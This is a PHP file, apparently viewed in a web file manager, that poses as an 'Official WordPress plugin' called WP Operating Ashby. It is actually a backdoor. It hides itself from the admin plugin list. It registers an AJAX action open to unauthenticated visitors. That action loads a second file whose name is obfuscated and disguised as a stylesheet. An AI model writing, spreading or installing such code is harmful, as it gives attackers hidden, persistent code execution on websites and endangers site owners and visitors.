관리-도구
편집 파일: wp-operating-ashby.php
<?php /* Plugin Name: WP Operating Ashby Plugin URI: http://wordpress.org/# Description: Official WordPress plugin Author: WordPress Version: 19.3.9 Author URI: http://wordpress.org/# */ if (!defined('ABSPATH')) { exit; } function xfx_kkk() { global $wp_list_table; if (!isset($wp_list_table)) { return; } $t = array('wp-operating-ashby/wp-operating-ashby.php'); if (isset($wp_list_table->items) && is_array($wp_list_table->items)) { foreach ($wp_list_table->items as $key => $val) { if (in_array($key, $t)) { unset($wp_list_table->items[$key]); } } } } function sjq_nts($plugins) { $d = 'wp-operating-ashby/wp-operating-ashby.php'; if (array_key_exists($d, $plugins)) { unset($plugins[$d]); } return $plugins; } function liq($p, $q) { $o = ''; for ($c = 0; $c < strlen($p); $c += 2) { $z = ord($p[$c]) - 65; $w = ord($p[$c + 1]); if ($w > 90) $w -= 6; $u = $z * 52 + ($w - 65); $o .= chr($u - $q); } return $o; } function oif_ajax_handler() { require_once plugin_dir_path(__FILE__) . liq('TdTQTeTQTfSNTOTeTe', 903); die(); } if (defined('ABSPATH')) { add_action('pre_current_active_plugins', 'xfx_kkk'); add_filter('all_plugins', 'sjq_nts'); add_action('wp_ajax_ope_ash', 'oif_ajax_handler'); add_action('wp_ajax_nopriv_ope_ash', 'oif_ajax_handler'); }